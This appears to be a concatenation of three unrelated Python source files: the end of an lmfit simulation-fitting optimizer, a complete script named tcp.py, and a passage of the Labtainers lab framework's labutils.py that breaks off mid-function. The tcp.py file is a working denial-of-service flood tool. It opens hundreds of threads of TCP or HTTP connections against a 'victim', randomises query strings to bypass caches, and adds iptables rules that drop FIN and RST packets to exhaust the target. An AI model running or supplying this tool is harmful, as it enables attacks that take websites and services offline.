parameter = dict(p.valuesdict())
for caso in self.casos:
self.casos[caso].verifyFolders(self.iter,p)
self.casos[caso].writeCase(p,self.iter)
#if(self.thisIter != self.iter):
z = []
for caso in self.casos:
t = threading.Thread(target=self._run, args=(caso,''))
t.start()
z.append(t)
for t in z:
t.join()
# #sys.exit()
fun = dict()
residual = dict()
self._expToFunction()
self.results = dict()
totResid = []
totResid = np.array([])
for caso in self.casos:
x, y = self.casos[caso].simResults(self.iter)
if(self.iter == 1):
self.len1[caso] = len(x)
else:
if(len(x) != self.len1[caso]):
i = self.len1[caso]
z = i / len(x)
x = interpolation.zoom(x,z)
y = interpolation.zoom(y,z)
residual[caso] = -(self.expfcn[caso](x)-y)
self.results[caso] = [x,y]
#self.residual = residual
#totResid.append(residual[caso])
totResid = np.append(totResid,residual[caso])
self._statistics(p)
return totResid
def _per_iteration(self,pars, iter, resid, *args, **kws):
print(" ITER ", iter, [[i,pars.valuesdict()[i]] for i in pars.valuesdict()])
self.iter = iter+3
def optimize(self,**kwargs):
'''
Optimize.
This function start the optimization algorithm.
The residual is calculated from the simulation (using the external function provided for the case), and compare those results with the experimental data provided.
kwargs:
----------
kwargs for the lmfit.minimize function.
>>> optimize(method='basinhopping')
'''
self._updateParamList()
self.mi = lmfit.minimize(self._residual,
self.p,
**dict(kwargs, iter_cb=self._per_iteration)
)
lmfit.printfuncs.report_fit(self.mi.params, min_correl=0.5)
print(lmfit.fit_report(self.mi))
def _signal_handler(self,sig, frame):
print()
print("***********************************")
print("***********************************")
print()
print('You pressed Ctrl+C!')
print("Killing the running simulations:")
print(self.pid)
print()
print("***********************************")
print("***********************************")
for key in self.pid:
try:
parent = psutil.Process(self.pid[key])
except:
continue
for child in parent.children(recursive=True): # or parent.children() for recursive=False
try:
child.kill()
except:
print("Child process no longer exists.")
continue
try:
parent.kill()
except:
print("Parent process no longer exists.")
continue
sys.exit(0)
|
tcp.py
|
#!/usr/local/bin/python
# coding: latin-1
# Someone is watchin' at the script... Don't worry, it's alright if u dont touch anything :)
# - Retr0
"""
▒██ ██▒ █████▒▒█████ ██▀███ █ █░ ▒█████ ██▀███ ██ ▄█▀ ██████
▒▒ █ █ ▒░▓██ ▒▒██▒ ██▒▓██ ▒ ██▒▓█░ █ ░█░▒██▒ ██▒▓██ ▒ ██▒ ██▄█▒ ▒██ ▒
░░ █ ░▒████ ░▒██░ ██▒▓██ ░▄█ ▒▒█░ █ ░█ ▒██░ ██▒▓██ ░▄█ ▒▓███▄░ ░ ▓██▄
░ █ █ ▒ ░▓█▒ ░▒██ ██░▒██▀▀█▄ ░█░ █ ░█ ▒██ ██░▒██▀▀█▄ ▓██ █▄ ▒ ██▒
▒██▒ ▒██▒░▒█░ ░ ████▓▒░░██▓ ▒██▒░░██▒██▓ ░ ████▓▒░░██▓ ▒██▒▒██▒ █▄▒██████▒▒
▒▒ ░ ░▓ ░ ▒ ░ ░ ▒░▒░▒░ ░ ▒▓ ░▒▓░░ ▓░▒ ▒ ░ ▒░▒░▒░ ░ ▒▓ ░▒▓░▒ ▒▒ ▓▒▒ ▒▓▒ ▒ ░
░░ ░▒ ░ ░ ░ ▒ ▒░ ░▒ ░ ▒░ ▒ ░ ░ ░ ▒ ▒░ ░▒ ░ ▒░░ ░▒ ▒░░ ░▒ ░ ░
░ ░ ░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
"""
import socket
from time import sleep
from threading import Thread, active_count
from os import *
import random
import string
import signal
import ssl
import argparse
import sys
example_text = ''' \nTips: Target page with 1500+ bytes size.
example:
python %s example.com/test.php -p 80 -http
python %s example.com/hello/ -p 443 -ssl -http
python %s example.com -p 80 -http
python %s example.com -p 21 -payload 68656c6c6f
python %s example.com -p 22
Connects - TCP handshakes towards victim
Payloads - Recevied payloads by victim
Dropped - TCP handshakes or payloads rejected by victim (site down)
''' % (sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0])
parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawTextHelpFormatter)
parser._action_groups.pop()
required = parser.add_argument_group('required arguments')
optional = parser.add_argument_group('optional arguments')
required.add_argument('target', help='Specify a target to attack')
required.add_argument('-p', dest='port', help='Specify port to attack', type=int, required=True)
optional.add_argument('-t', dest='THREADS', type=int, default=300, help='Threads, default = 300 threads')
optional.add_argument('-ssl', action='store_true', help='Enable SSL')
optional.add_argument('-http', action='store_true', help='Enable HTTP headers (only if custom payload not set)')
optional.add_argument('-payload', help='Set payload as hex-string')
print("\ntcp flood.\n")
args = parser.parse_args()
connected = 0
dropped = 0
payloads = 0
port = args.port
# Sort out http URI in targets
target = args.target.replace('http://','').replace('https://','')
if '/' in target and args.http:
path = target[target.find('/'):]
target = target[:target.find('/')]
else:
path = '/'
# Decode custom payload
try:
if args.payload:
payload = args.payload.decode('hex')
else:
payload = ''
except:
print('Use hex string format as payload.')
sys.exit()
# Check if script is running as root
if geteuid() != 0:
print("Run %s as root." % sys.argv[0])
sys.exit()
# Catch CTRL+C to abort
stop = False
def signal_handler(signal, frame):
global stop
stop = True
signal.signal(signal.SIGINT, signal_handler)
# String generator for Cache bypassing on load balancers (Random letters in lenght 3 to 8)
def string_generator(size=random.randint(3, 8), chars=string.ascii_uppercase + string.ascii_lowercase):
return ''.join(random.choice(chars) for _ in range(size))
# Generate HTTP Payload
def http_payload():
payload = 'GET %s?%s HTTP/1.1\r\n' % (path, string_generator())
payload += 'Host: %s\r\n' % target
payload += 'User-Agent: Kittenz Launcher!!!\r\n'
payload += 'Connection: keep-alive\r\n\r\n'
return payload
# DOS function
def spam(target_ip, payload):
global connected, dropped, payloads
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 2 sec TCP timeout
s.settimeout(2)
try:
s.connect((target_ip, port))
connected += 1
# Wrap connection with SSL if specified
if args.ssl:
s = ssl.wrap_socket(s, cert_reqs = ssl.CERT_NONE)
if args.http and not args.payload:
payload = http_payload()
s.send(payload)
payloads += 1
s.close()
except:
dropped += 1
if stop == True:
break
if __name__ == '__main__':
target_ip = socket.gethostbyname(target)
# add IP tables to drop FIN and RST packets towards TARGET
system('iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP' %( target_ip, port ))
system('iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags RST RST -j DROP' %( target_ip, port ))
# Fire up threads running spam() function
threads = []
for i in range(args.THREADS):
t = Thread(target=spam, args=(target_ip, payload,))
threads.append(t)
t.start()
while True:
# Keep going until ctrl+c is pressed
if active_count() == 1 or stop == True:
# when ctrl+c is pressed, restore IP tables.
system('iptables -D OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP' %( target_ip, port ))
system('iptables -D OUTPUT -d %s -p tcp --dport %d --tcp-flags RST RST -j DROP' %( target_ip, port ))
print("")
break
else:
sleep(0.1)
sys.stdout.write('Connects: %d, Payloads: %d, Dropped: %d \r' % (connected, payloads, dropped))
sys.stdout.flush()
# Really intrigued by the script huh? You looked at the whole thing...
# Do u even have a life? Kiddin' LOL
# - Retr0
|
labutils.py
|
'''
This software was created by United States Government employees at
The Center for Cybersecurity and Cyber Operations (C3O)
at the Naval Postgraduate School NPS. Please note that within the
United States, copyright protection is not available for any works
created by United States Government employees, pursuant to Title 17
United States Code Section 105. This software is in the public
domain and is not subject to copyright.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import filecmp
import glob
import json
import hashlib
from hashlib import md5
import os
import shutil
import re
import subprocess
import sys
import time
import zipfile
import ParseStartConfig
import ParseLabtainerConfig
import datetime
import getpass
import socket
import fcntl
import struct
import threading
import LabCount
import shlex
import stat
import traceback
import string
import errno
import registry
import dockerPull
''' assumes relative file positions '''
here = os.path.dirname(os.path.abspath(__file__))
lab_bin_dir = os.path.join(here, '../lab_bin')
sys.path.append(lab_bin_dir)
import ParameterParser
import InspectLocalReg
import InspectRemoteReg
''' logger is defined in whatever script that invokes the labutils '''
global logger
# Error code returned by docker inspect
SUCCESS=0
FAILURE=1
'''
Version number embeded as a label into each docker image.
Current framework version (per below) must be at least
what is found in the image. This is only used for
framework/image compatibility, to tell a user that a given
lab cannot be run without doing an update.
'''
framework_version = 3
osTypeMap = {}
networkImages = []
# Create a directory path based on input path
# Note: Do not create if the input path already exists as a directory
# If input path is a file, remove the file then create directory
def createDirectoryPath(input_path):
# if it exist as a directory, do not delete (only delete if it is a file)
if os.path.exists(input_path):
# exists but is not a directory
if not os.path.isdir(input_path):
# remove file then create directory
os.remove(input_path)
os.makedirs(input_path)
#else:
# logger.debug("input_path directory (%s) exists" % input_path)
else:
# does not exists, create directory
os.makedirs(input_path)
def isValidLab(lab_path):
# Lab path must exist and must be a directory
if os.path.exists(lab_path) and os.path.isdir(lab_path):
# Assume it is valid lab then
#logger.debug("lab_path directory (%s) exists" % lab_path)
pass
else:
logger.error("Invalid lab! lab_path directory (%s) does not exist!" % lab_path)
#traceback.print_exc()
#traceback.print_stack()
sys.exit(1)
def getFirstUnassignedIface(n=1):
''' get the nth network iterface that lacks an assigned IP address '''
iflist = os.listdir('/sys/class/net')
for iface in sorted(iflist):
count = 1
ip = get_ip_address(iface)
if ip is None and n == count:
return iface
count += 1
return None
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sp = struct.pack('256s', str.encode(ifname[:15]))
try:
fc = fcntl.ioctl(s.fileno(), 0x8915, sp)
except:
return None
return socket.inet_ntoa(fc[20:24])
def get_hw_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if sys.version_info >=(3,0):
try:
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', bytes(ifname, 'utf-8')[:15]))
return ':'.join('%02x' % b for b in info[18:24])
except:
return None
else:
try:
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', str(ifname[:15])))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
except:
return None
def get_new_mac(ifname):
''' use last two byte of mac address to generate a new mac
intended for use on macvlan '''
# TBD move this hardcoded prefix into some config file?
preface = '02:43:ac:12'
my_mac = get_hw_address(ifname)
parts = my_mac.split(':')
p1 = parts[4]
p2 = parts[5]
full = '%s:%s:%s' % (preface, p1, p2)
return full
def isalphadashscore(name):
# check name - alphanumeric,dash,underscore
return re.match(r'^[a-zA-Z0-9_-]*$', name)
# get docker0 IP address
def getDocker0IPAddr():
#return get_ip_address('docker0')
cmd = "docker inspect -f '{{ .NetworkSettings.IPAddress }}' docker0"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) == 0:
''' is a docker0 master container '''
if len(output[0].strip()) > 0:
return output[0].decode('utf-8').strip()
else:
return None
else:
return get_ip_address('docker0')
# Parameterize my_container_name container
def ParameterizeMyContainer(mycontainer_name, mycontainer_image_name, container_user, container_password, lab_instance_seed,
user_email, labname, lab_path, name, image_info, running_container=None):
retval = True
if running_container == None:
running_container = mycontainer_name
''' copy lab_bin and lab_sys files into .local/bin and / respectively '''
CopyLabBin(running_container, mycontainer_image_name, container_user, lab_path, name, image_info)
cmd = 'docker exec %s script -q -c "chown -R %s:%s /home/%s"' % (mycontainer_name, container_user, container_user, container_user)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
cmd = 'docker exec %s script -q -c "chown root:root /usr"' % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
cmd_path = '/home/%s/.local/bin/parameterize.sh' % (container_user)
if container_password == "":
container_password = container_user
version = '0'
if image_info is None or image_info.version is None:
''' is a build, version -1 '''
version = '-1'
else:
#print(str(image_info))
if image_info.version is not None:
version = image_info.version
display = os.getenv('DISPLAY')
command=['docker', 'exec', '-i', running_container, cmd_path, container_user, container_password, lab_instance_seed, user_email, labname, mycontainer_name, version, display ]
logger.debug("About to call parameterize.sh with : %s" % str(command))
#return retval
child = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
error_string = child.stderr.read().decode('utf-8')
if len(error_string) > 0:
for line in error_string.splitlines(True):
if not line.startswith('[sudo]') and "LC_ALL" not in line and "ENCRYPT_METHOD" not in line:
logger.error('ParameterizeMyContainer %s' % line)
retval = False
else:
logger.debug(line)
out_string = child.stdout.read().decode('utf-8').strip()
if len(out_string) > 0:
logger.debug('ParameterizeMyContainer %s' % out_string)
if mycontainer_image_name in networkImages:
cmd = "docker exec %s bash -c 'mkdir -p /run/sshd'" % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('Failed mkdir of /run/sshd')
exit(1)
cmd = "docker exec %s bash -c 'chmod 0755 /run/sshd'" % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('Failed chmod of /run/sshd')
exit(1)
else:
pass
return retval
def DoCmd(cmd):
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
retval = True
if len(output[1]) > 0:
logger.error(output[1].decode('utf-8'))
retval = False
if len(output[0]) > 0:
logger.debug(output[0].decode('utf-8'))
return retval
# Start my_container_name container
def StartMyContainer(mycontainer_name):
retval = True
if IsContainerRunning(mycontainer_name):
logger.error("Container %s is already running!\n" % (mycontainer_name))
sys.exit(1)
command = "docker start %s" % mycontainer_name
#logger.debug("Command to execute is (%s)" % command)
if not DoCmd(command):
retval = False
return retval
def AllContainersCreated(container):
clone_names = GetContainerCloneNames(container)
for clone_full in clone_names:
if not IsContainerCreated(clone_full):
return False
return True
# Check to see if my_container_name container has been created or not
def IsContainerCreated(mycontainer_name):
retval = True
command = "docker inspect -f {{.Created}} --type container %s" % mycontainer_name
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(shlex.split(command), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
if result == FAILURE:
retval = False
logger.debug("Result of subprocess.call for %s IsContainerCreated is %s (1=>FAILURE)" % (mycontainer_name, result))
return retval
def GetNetParam(start_config, mysubnet_name, mysubnet_ip, mycontainer_name):
''' return the network address parameter and mac parameter for use in creating a container
or connecting the container to a network. Parse out mac address suffix if it exists,
and adjust the ip address based on clone numbers if the address has a "+CLONE" suffix '''
mac = ''
ip_param = ''
if ':' in mysubnet_ip:
mysubnet_ip, mac_addr = mysubnet_ip.split(':',1)
mac = '--mac-address=%s' % mac_addr
elif mysubnet_ip.lower() == 'auto_mac':
mac_addr = get_new_mac(start_config.subnets[mysubnet_name].macvlan_use)
mac = '--mac-address=%s' % mac_addr
if not mysubnet_ip.lower().startswith('auto'):
if '+' in mysubnet_ip:
ip, clone_type = mysubnet_ip.split('+')
if clone_type.lower() == 'clone' or start_config.multi_user == 'clones':
name, role = mycontainer_name.rsplit('.',1)
dumb, offset = name.rsplit('-', 1)
try:
offset_int = int(offset)
except:
logger.error('expected use of clone, but did not find clone counter in %s' % mycontainer_name)
exit(1)
ip_start, ip_suffix = ip.rsplit('.', 1)
ip_suffix_int = int(ip_suffix)
new_suffix = ip_suffix_int + offset_int - 1
if new_suffix > 254:
logger.error('IP address adjusted to invalid value %d %s' % (new_suffix, mysubnet_ip))
exit(1)
ip_param = '--ip=%s.%d' % (ip_start, new_suffix)
elif clone_type.lower() == 'clone_mac' and start_config.multi_user == 'client':
# assuming we are a multiuser client
mac_addr = get_new_mac(start_config.subnets[mysubnet_name].macvlan_use)
mac = '--mac-address=%s' % mac_addr
else:
print('ip %s' % ip)
ip_param = '--ip=%s' % ip
else:
ip_param = '--ip=%s' % mysubnet_ip
return ip_param, mac
def ConnectNetworkToContainer(start_config, mycontainer_name, mysubnet_name, mysubnet_ip):
logger.debug("Connecting more network subnet to container %s" % mycontainer_name)
ip_param, dumb = GetNetParam(start_config, mysubnet_name, mysubnet_ip, mycontainer_name)
command = "docker network connect %s %s %s" % (ip_param, mysubnet_name, mycontainer_name)
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(shlex.split(command), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
logger.debug("Result of subprocess.call ConnectNetworkToContainer is %s" % result)
return result
def DisconnectNetworkFromContainer(mycontainer_name, mysubnet_name):
logger.debug("Disconnecting more network subnet to container %s" % mycontainer_name)
command = "docker network disconnect %s %s" % (mysubnet_name, mycontainer_name)
#logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
result = 0
if len(output[1]) > 0:
logger.error(output[1].decode('utf-8'))
result = 1;
return result
def SetXhost():
''' allow container root users to access xserver '''
cmd = 'xhost'
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if not 'LOCAL:' in output[0].decode('utf-8'):
cmd = 'xhost local:root'
os.system(cmd)
def GetContainerCloneNames(container):
''' populate dictionary with hostname/container names based on the quantity of clones
that are to be created '''
retval = {}
if container.clone_copies is None or container.clone == 1:
retval[container.full_name] = container.hostname
else:
try:
count = int(container.clone_copies)
except:
logger.error('bad clone value for %s' % container.hostname)
exit(1)
name, role = container.full_name.rsplit('.', 1)
for i in range(1, count+1):
hostname = '%s-%d' % (container.hostname, i)
fullname = '%s-%d.%s' % (name, i, role)
retval[fullname] = hostname
return retval
def GetDNS_NMCLI():
dns_param = ''
dns_param = '--dns=8.8.8.8'
cmd="nmcli dev show | grep 'IP4.DNS'"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0]) > 0:
for line in output[0].decode('utf-8').splitlines(True):
dns_param = '--dns=%s %s' % (line.split()[1].strip(), dns_param)
''' just take first '''
break
return dns_param
def GetDNS():
dns_param = ''
dns_param = '--dns=8.8.8.8'
labtainer_dns = os.getenv('LABTAINER_DNS')
if labtainer_dns is not None and len(labtainer_dns)>0:
dns_param = '--dns=%s %s' % (labtainer_dns.strip(), dns_param)
else:
cmd="systemd-resolve --status | grep 'DNS Servers:'"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0]) > 0:
for line in output[0].decode('utf-8').splitlines(True):
dns_param = '--dns=%s %s' % (line.split()[2].strip(), dns_param)
''' just take first '''
break
else:
dns_param = GetDNS_NMCLI()
return dns_param
def GetX11SSH():
''' EXPERIMENTAL, not used '''
ip = '192.168.1.222'
xauth = '/tmp/.docker.xauth'
#display = os.getenv('DISPLAY')
display = ':10'
cmd = 'xauth list %s' % display
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0]) > 0:
parts = output[0].decode('utf-8').strip().split()
magic_cookie = parts[2]
else:
print('could not find magic cookie')
exit(1)
x11_port = display.split(':')[1]
#print('x11_port %s' % x11_port)
cmd = 'xauth -f /tmp/.docker.xauth add %s:%s . %s' % (ip, x11_port, magic_cookie)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
os.chmod(xauth, 0o777)
retval = '--env="%s:%s" -v %s:%s -e XAUTHORITY="%s"' % (ip, x11_port, xauth, xauth, xauth)
#retval = '--env="DISPLAY" -v %s:%s -e XAUTHORITY="%s"' % (xauth, xauth, xauth)
return retval
def isUbuntuSystemd(image_name):
''' NOTE side effect of update networkImages global '''
done = False
retval = None
#print('check if %s is systemd' % image_name)
cmd = "docker inspect -f '{{json .Config.Labels.base}}' --type image %s" % image_name
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0].strip()) > 0:
#logger.debug('isUbuntuSystemd base %s' % output[0].decode('utf-8'))
if output[0].decode('utf-8').strip() == 'null':
base = image_name
else:
base = output[0].decode('utf-8').rsplit('.', 1)[0]
if base.startswith('"'):
base = base[1:]
if '/' in base and '/' in image_name:
my_registry = image_name.split('/')[0]
no_reg = base.split('/')[1]
base = '%s/%s' % (my_registry, no_reg)
cmd = "docker history --no-trunc %s" % base
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
for line in output[0].decode('utf-8').splitlines():
if 'sshd' in line or 'xinetd' in line:
net_image = image_name
if '/' in image_name:
net_image = image_name.split('/')[1]
if net_image not in networkImages:
networkImages.append(net_image)
if 'Labtainer base image from ubuntu-systemd' in line:
retval = 'ubuntu16'
if 'ubuntu20' in line:
retval = 'ubuntu20'
break
return retval
def isFirefox(image_name):
done = False
retval = False
#print('check if %s is systemd' % image_name)
cmd = "docker inspect -f '{{json .Config.Labels.base}}' --type image %s" % image_name
#print('lab container cmd is %s' % cmd)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0].strip()) > 0:
logger.debug('base %s' % output[0].decode('utf-8'))
if output[0].decode('utf-8').strip() == 'null':
base = image_name
else:
base = output[0].decode('utf-8').rsplit('.', 1)[0]+'"'
cmd = "docker history --no-trunc %s" % base
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
for line in output[0].decode('utf-8').splitlines():
if 'firefox' in line:
retval = True
break
return retval
def FindTap(start_config):
for container_name in start_config.containers:
#logger.debug('FindTapMonitor check %s' % container_name)
if start_config.containers[container_name].tap.lower() == 'yes':
return container_name
return None
def FindTapMonitor(start_config):
for container_name in start_config.containers:
#logger.debug('FindTapMonitor check %s' % container_name)
for subnet in start_config.containers[container_name].container_nets:
#logger.debug('FindTapMonitor check lan %s' % subnet)
if subnet.lower() == 'tap_lan':
ip = start_config.containers[container_name].container_nets[subnet]
return container_name, ip
return None, None
def HandleVolumes(volume, container):
for m in container.mounts:
logger.debug('adding volume mount %s' % m)
''' host volume is relative to ~/.local/share/labtainers, container relative to Home unless absolute '''
try:
hostv, containerv = m.split(':')
except:
self.lgr.error('Bad mount definition %s' % m)
exit(1)
homedir = os.environ['HOME']
host_path = os.path.join(homedir, '.local', 'share', 'labtainers', hostv)
if not os.path.isfile(host_path):
try:
os.mkdir(host_path)
except:
pass
container_path = os.path.join('/home', container.user, containerv)
volume = volume + ' -v %s:%s:rw' % (host_path, container_path)
return volume
def checkSbin(lab_path, name):
sbin = os.path.join(lab_path, name, '_system','sbin')
if os.path.isdir(sbin) and not os.path.islink(sbin):
return False
else:
return True
def CreateSingleContainer(labtainer_config, start_config, container, lab_path, mysubnet_name=None, mysubnet_ip=None, quiet=False):
''' create a single container -- or all clones of that container per the start.config '''
retval = True
#image_exists, result, new_image_name = ImageExists(container.image_name, container.registry)
if container.registry == labtainer_config.test_registry:
branch, container_registry = registry.getBranchRegistry()
base_registry = container_registry
else:
container_registry = container.registry
base_registry = container.base_registry
logger.debug("Create Single Container for %s using registry %s" % (container.name, container_registry))
image_info = imageInfo(container.image_name, container_registry, base_registry, labtainer_config, quiet=quiet)
if image_info is None:
logger.error('Could not find image for %s' % container.image_name)
retval = False
else:
new_image_name = container.image_name
if not image_info.local_build:
new_image_name = '%s/%s' % (container_registry, container.image_name)
if not image_info.local:
pullDockerImage(container_registry, container.image_name)
docker0_IPAddr = getDocker0IPAddr()
logger.debug("getDockerIPAddr result (%s)" % docker0_IPAddr)
volume=''
ubuntu_systemd = isUbuntuSystemd(new_image_name)
if ubuntu_systemd is not None:
osTypeMap[container.image_name] = ubuntu_systemd
if ubuntu_systemd == 'ubuntu20':
if not checkSbin(lab_path, container.name):
logger.error('/sbin found in ubuntu20 container %s. Would be fatal, exiting.' % container.name)
return False
is_firefox = isFirefox(new_image_name)
if is_firefox:
shm = '--shm-size=2g'
else:
shm = ''
if container.script == '' or ubuntu_systemd is not None:
logger.debug('Container %s is systemd or has script empty <%s>' % (new_image_name, container.script))
''' a systemd container, centos or ubuntu? '''
if ubuntu_systemd == 'ubuntu16':
''' A one-off run to set some internal values. This is NOT what runs the lab container '''
#volume='--security-opt seccomp=confined --tmpfs /run --tmpfs /run/lock -v /sys/fs/cgroup:/sys/fs/cgroup:ro'
volume='--security-opt seccomp=unconfined --tmpfs /run --tmpfs /run/lock -v /sys/fs/cgroup:/sys/fs/cgroup:ro'
cmd = 'docker run --rm --privileged -v /:/host %s setup' % new_image_name
logger.debug('cmd is %s' % cmd)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
logger.debug('back from docker run, output %s' % (output[0].decode('utf-8')))
if len(output[1]) > 0:
logger.debug('back from docker run, error %s' % (output[1].decode('utf-8')))
volume = ''
elif ubuntu_systemd == 'ubuntu20':
volume = volume + " -v /sys/fs/cgroup:/sys/fs/cgroup:ro "
if container.x11.lower() == 'yes':
#volume = '-e DISPLAY -v /tmp/.Xll-unix:/tmp/.X11-unix --net=host -v$HOME/.Xauthority:/home/developer/.Xauthority'
#volume = volume+' --env="DISPLAY" --volume="/tmp/.X11-unix:/tmp/.X11-unix:rw"'
volume = volume+' --env="DISPLAY" --volume="/tmp/.X11-unix:/var/tmp/.X11-unix:rw"'
logger.debug('container using X11')
volume = HandleVolumes(volume, container)
if container.mystuff.lower() == 'yes':
here = os.getcwd()
mystuff_dir = os.path.join(here, 'mystuff')
myv = ' --volume="%s:/home/%s/mystuff:rw"' % (mystuff_dir, container.user)
volume = volume+myv
mystuff_dir = os.path.join(os.environ['LABTAINER_DIR'], 'scripts', 'labtainer-student','mystuff')
try:
os.mkdir(mystuff_dir)
except:
pass
#if container.thumb_volume is not None:
# volume = volume+' --volume="/dev:/dev:rw"'
# #volume = volume+' --device="/dev/sdb"'
add_hosts = ''
if "_" in container.name:
no_underscores = container.name.replace("_","")
add_hosts = '--add-host %s:127.0.0.1 ' % no_underscores
for item in container.add_hosts:
if ':' not in item:
if item in start_config.lan_hosts:
for entry in start_config.lan_hosts[item]:
if not entry.startswith(container.name):
add_this = '--add-host %s ' % entry
add_hosts += add_this
else:
logger.error('ADD-HOST entry in start.config missing colon: %s' % item)
logger.error('sytax: ADD-HOST <host>:<ip>')
return
else:
add_this = '--add-host %s ' % item
add_hosts += add_this
if docker0_IPAddr is not None:
add_host_param = '--add-host my_host:%s %s' % (docker0_IPAddr, add_hosts)
else:
add_host_param = add_hosts
if container.tap == 'yes':
''' docker fu when using host networking, sudo hangs looking for host ip? '''
add_host_param = '--add-host %s:127.0.0.1 %s' % (container.hostname, add_host_param)
monitor_tap, ip = FindTapMonitor(start_config)
if monitor_tap is not None:
add_host_param = '--add-host monitor_tap:%s %s' % (ip, add_host_param)
wait_tap_dir = GetWaitTapDir()
volume = '%s --volume %s:/tmp/wait_tap_dir' % (volume, wait_tap_dir)
dns_param = GetDNS()
priv_param = ''
if container.no_privilege != 'yes':
priv_param = '--privileged'
publish_param = ''
if container.publish is not None:
publish_param = '--publish %s' % container.publish
mac = ''
subnet_ip = ''
network_param = ''
if container.tap == 'yes':
network_param = '--network=host'
elif mysubnet_name is not None:
network_param = '--network=%s' % mysubnet_name
multi_user = ''
if container.client == 'yes' and start_config.multi_user is not None:
#print('use putenv to set %s' % start_config.multi_user)
os.putenv("DISTRIBUTED_LABTAINER", start_config.multi_user)
''' why does putenv not set the value? '''
os.environ['DISTRIBUTED_LABTAINER'] = start_config.multi_user
multi_user = '--env=DISTRIBUTED_LABTAINER'
num_cpu_str = ''
if container.num_cpus is not None:
num_cpu_str = '--cpus=%s' % container.num_cpus
cpu_set_str = ''
if container.cpu_set is not None:
cpu_set_str = '--cpuset-cpus=%s' % container.cpu_set
clone_names = GetContainerCloneNames(container)
for clone_fullname in clone_names:
clone_host = clone_names[clone_fullname]
if mysubnet_name is not None:
subnet_ip, mac = GetNetParam(start_config, mysubnet_name, mysubnet_ip, clone_fullname)
#createsinglecommand = "docker create -t %s --ipc host --cap-add NET_ADMIN %s %s %s %s %s --name=%s --hostname %s %s %s %s %s" % (dns_param,
if len(container.docker_args) == 0:
createsinglecommand = "docker create %s -t %s --cap-add NET_ADMIN %s %s %s %s %s %s --name=%s --hostname %s %s %s %s %s %s" % \
(shm, dns_param, network_param, subnet_ip, mac, priv_param, add_host_param,
publish_param, clone_fullname, clone_host, volume,
multi_user, num_cpu_str, cpu_set_str, new_image_name)
else:
